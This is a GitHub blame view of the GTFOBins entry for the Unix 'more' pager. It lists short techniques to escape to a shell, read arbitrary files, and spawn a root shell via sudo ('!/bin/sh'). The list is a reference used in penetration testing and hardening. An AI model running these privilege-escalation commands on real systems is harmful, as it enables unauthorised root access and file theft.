GTFOBins.github.io/_gtfobins/more.md

16 lines
250 B
Markdown
Raw Permalink Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-07-16 15:01:50 +02:00
- code: |
TERM= more /etc/profile
!/bin/sh
2018-05-28 19:55:44 +02:00
file-read:
2018-07-16 15:01:50 +02:00
- code: more file_to_read
2018-10-05 19:55:38 +02:00
suid:
2018-08-24 12:08:37 +02:00
- code: ./more file_to_read
2018-10-05 19:55:38 +02:00
sudo:
2018-07-16 15:01:50 +02:00
- code: |
TERM= sudo more /etc/profile
2018-07-16 15:01:50 +02:00
!/bin/sh
---